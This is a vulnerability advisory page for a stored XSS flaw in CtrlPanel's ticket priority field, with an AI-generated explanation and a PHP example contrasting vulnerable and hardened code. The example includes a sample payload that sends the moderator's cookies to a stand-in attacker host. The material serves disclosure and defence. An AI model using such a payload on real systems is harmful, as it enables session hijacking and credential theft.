CVE-2025-25203
Description
CtrlPanel is open-source billing software for hosting providers. Prior to version 1.0, a Cross-Site Scripting (XSS) vulnerability exists in the TicketsController and Moderation/TicketsController due to insufficient input validation on the priority field during ticket creation and unsafe rendering of this field in the moderator panel. Version 1.0 contains a patch for the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS in CtrlPanel's TicketsController priority field allows attackers to execute scripts in the moderator's browser.
A stored Cross-Site Scripting (XSS) vulnerability was identified in CtrlPanel, an open-source billing platform for hosting providers, prior to version 1.0. The flaw resides in TicketsController and Moderation/TicketsController, where the priority field during ticket creation is not validated or sanitized [1]. The code directly accepts user input for the priority field without any filtering, and the same unsanitized data is later rendered with rawColumns in the moderator panel [1].
An attacker exploits this by submitting a ticket whose priority field carries a malicious payload [1]. Because the priority value is emitted as raw HTML by the dataTable method of Moderation/TicketsController, the injected script runs as soon as a moderator opens the ticket list [1]. No privilege beyond the ability to create a ticket is needed: the attacker simply submits a ticket with an XSS payload in place of a priority value, and the payload persists until a moderator views it.
Successful exploitation lets the attacker execute arbitrary JavaScript in the moderator's browser session [1]. That session can then be used for session hijacking, credential theft, or further actions in the hosting panel with the moderator's privileges. The vulnerability is rated High with a CVSS v3 score of 8.1.
The issue was addressed in version 1.0 via commit 393cbde, which adds server-side validation (e.g., 'priority' => ['required', 'in:Low,Medium,High']) so the priority field only accepts the expected values [2]. Operators should upgrade to version 1.0 or later. Because the described fix validates input at ticket creation time, anyone upgrading should also review tickets created before the upgrade for priority values outside Low, Medium and High.
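To make the mechanics and the fix concrete, here is an added example in plain PHP; it is not CtrlPanel's code and not the patch itself. It puts the vulnerable pattern (store the submitted priority verbatim, emit it as raw HTML) beside a hardened version that applies the same allow-list the fix enforces and HTML-escapes on output as defence in depth for rows stored before the fix. The function names (storeTicketUnsafe, renderPriorityUnsafe, validatePriority, storeTicketSafe, renderPrioritySafe) and the sample payload are constructed for illustration.

```php
<?php
// Added example, not CtrlPanel's own code. Function names and the sample
// request are illustrative assumptions.
declare(strict_types=1);

const ALLOWED_PRIORITIES = ['Low', 'Medium', 'High'];

// Vulnerable pattern described in the advisory: the submitted priority is
// stored without validation and later concatenated into HTML unescaped
// (the effect of passing the column through a rawColumns()-style path).
function storeTicketUnsafe(array $input): array
{
    return ['priority' => (string) ($input['priority'] ?? '')];
}

function renderPriorityUnsafe(array $ticket): string
{
    return '<td>' . $ticket['priority'] . '</td>';
}

// Hardened version. (1) Allow-list check, equivalent to the Laravel rule
// 'priority' => ['required', 'in:Low,Medium,High'] that the fix adds.
// Strict comparison avoids PHP loose-equality surprises.
function validatePriority(string $priority): bool
{
    return in_array($priority, ALLOWED_PRIORITIES, true);
}

function storeTicketSafe(array $input): array
{
    $priority = (string) ($input['priority'] ?? '');
    if (!validatePriority($priority)) {
        throw new InvalidArgumentException('The selected priority is invalid.');
    }
    return ['priority' => $priority];
}

// (2) Escape on output so that a value stored before the fix cannot run.
function renderPrioritySafe(array $ticket): string
{
    $escaped = htmlspecialchars($ticket['priority'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<td>' . $escaped . '</td>';
}

// Constructed sample request: a ticket whose priority is a script tag.
$malicious = [
    'priority' => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
];

// Vulnerable path: the script tag reaches the moderator's page intact.
echo 'Unsafe: ' . renderPriorityUnsafe(storeTicketUnsafe($malicious)) . PHP_EOL;

// Hardened path: the request is rejected at validation time.
try {
    storeTicketSafe($malicious);
} catch (InvalidArgumentException $e) {
    echo 'Safe store rejected the ticket: ' . $e->getMessage() . PHP_EOL;
}

// Defence in depth: a legacy row holding the payload is rendered inert.
echo 'Safe render of legacy row: ' . renderPrioritySafe($malicious) . PHP_EOL;
echo 'Safe render of valid value: '
    . renderPrioritySafe(storeTicketSafe(['priority' => 'High'])) . PHP_EOL;
```

In the real application the allow-list belongs in the request validation for ticket creation, as the patch does, and the priority column should not be emitted as raw HTML in the moderator DataTable; in a Laravel DataTables setup that means leaving the column out of the rawColumns() list so the library escapes it, or escaping it explicitly as above. Validation alone stops new payloads but does nothing for rows that were stored before the upgrade, which is why the rendering side is worth fixing as well.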
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- CtrlPanel, range: 0.1 up to (excluding) 1.0
Patches
2c26d81f87fdb393cbde662c7
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (2)
News mentions (0)
No linked articles in our index yet.